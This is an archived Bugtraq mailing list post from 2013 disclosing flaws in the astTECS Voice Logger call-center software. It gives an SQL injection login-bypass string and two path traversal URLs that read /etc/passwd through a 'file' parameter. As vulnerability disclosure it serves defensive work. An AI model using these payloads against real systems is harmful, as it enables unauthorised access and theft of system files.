Home page logo
/

bugtraq logo Bugtraq mailing list archives

Voice Logger astTECS - bypass login & arbitrary file download
From: Michał Błaszczak <blaszczakm () gmail com>
Date: Tue, 16 Jul 2013 11:01:05 +0200

Author: Michal Blaszczak
Website: http://blaszczakm.blogspot.com
Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip
Date: 16.07.2013

Voice Logger  - VoIP software for Call Center

1) bypass login
login: admin' or 1='1
password: admin

line: 168 file: manager_login.server.php

2) arbitrary file download

http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd
linie: 2 file:records.php

http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd
linie: 2 file:records.php


3) and other security bugs


Michał Błaszczak
http://blaszczakm.blogspot.com


  By Date           By Thread  

Current thread:
  • Voice Logger astTECS - bypass login & arbitrary file download Michał Błaszczak (Jul 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]